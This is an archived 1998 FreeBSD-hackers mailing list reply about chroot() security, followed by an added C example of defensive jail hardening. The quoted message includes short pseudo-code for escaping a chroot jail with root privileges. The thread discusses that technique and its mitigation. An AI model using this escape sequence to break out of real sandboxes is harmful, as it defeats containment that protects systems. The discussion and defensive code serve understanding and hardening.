Date: Sat, 21 Nov 1998 19:45:47 -0800
From: Don Lewis <Don.Lewis@tsc.tdk.com>
To: Eivind Eklund <eivind@yes.no>, Mike Smith <mike@smith.net.au>, Harold Gutch <logix@foobar.franken.de>
Cc: zhihuizhang <bf20761@binghamton.edu>, hackers <freebsd-hackers@FreeBSD.ORG>
Subject: Re: Question on chroot()
Message-ID: <199811220345.TAA00182@salsa.gv.tsc.tdk.com>
In-Reply-To: Eivind Eklund <eivind@yes.no> "Re: Question on chroot()" (Nov 17, 12:54pm)
On Nov 17, 12:54pm, Eivind Eklund wrote:
} Subject: Re: Question on chroot()
} On Sun, Nov 15, 1998 at 12:56:03PM -0800, Mike Smith wrote:
} > It's quite difficult to break out of a chroot'ed environment, yes, and
} > it's intended to be impossible, so obviously you can only get out
} > through flaws in the implementation...
}
} It is easy if you have root privileges inside the "jail".
}
} /* pseudo-code */
} mkdir("mybreakdir", 0700);
} breakfd = open(".", 0, 0);
} chroot("mybreakdir");
} fchdir(breakfd);
} for (i=0; i<1000; i++)
}     chdir("..");
} chroot(".");
}
} I'm not sure if you need the fchdir();

You don't.

} chroot() is not supposed to
} affect your current directory.  I don't think anybody has fixed the
} above problem; it seems quite difficult to fix (you have to know which
} FDs are inside and outside the jail, which is non-trivial).

I implemented a local hack to solve the problem, though it has some
limitations.  I've thought of a better scheme that I have yet to
implement.  When I do, I'll post it for comments.

--- Truck

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-hackers" in the body of the message
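
The pseudo-code quoted above depends on two things: root privileges inside the jail, and a current directory or open descriptor that refers to a directory outside it. The following is an added example, not part of the original message and not FreeBSD code, showing how a program that jails itself can remove both before running untrusted work; the function names and the jail_dir, uid and gid parameters are assumptions made for illustration.

```c
/* Added example: user-space hardening for a self-jailing process (POSIX). */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1   /* glibc: declare chroot() and setgroups() */
#endif
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <grp.h>
#include <unistd.h>

/* Highest descriptor number to scan; capped (assumption) to bound the loop. */
static long fd_limit(void)
{
    long m = sysconf(_SC_OPEN_MAX);
    return (m < 0 || m > 65536) ? 65536 : m;
}

static int is_dir_fd(int fd)
{
    struct stat st;
    return fstat(fd, &st) == 0 && S_ISDIR(st.st_mode);
}

/* Count open descriptors that refer to directories (usable with fchdir()). */
int count_dir_fds(void)
{
    int n = 0;
    for (long fd = 0, max = fd_limit(); fd < max; fd++)
        n += is_dir_fd((int)fd);
    return n;
}

/* Close every open directory descriptor; returns how many were closed. */
int close_dir_fds(void)
{
    int n = 0;
    for (long fd = 0, max = fd_limit(); fd < max; fd++)
        if (is_dir_fd((int)fd) && close((int)fd) == 0) n++;
    return n;
}

/* Must be called as root. Order: drop directory handles, put the cwd inside
 * the jail before chroot(), then give up root and confirm it is gone. */
int enter_jail(const char *jail_dir, uid_t uid, gid_t gid)
{
    close_dir_fds();
    if (chdir(jail_dir) || chroot(".") || chdir("/")) return -1;
    if (setgroups(1, &gid) || setgid(gid) || setuid(uid)) return -1;
    return (uid != 0 && setuid(0) == 0) ? -1 : 0;
}
```

This only removes the preconditions for a process that jails itself and drops root; a process that keeps root inside the chroot is still in the situation the thread describes.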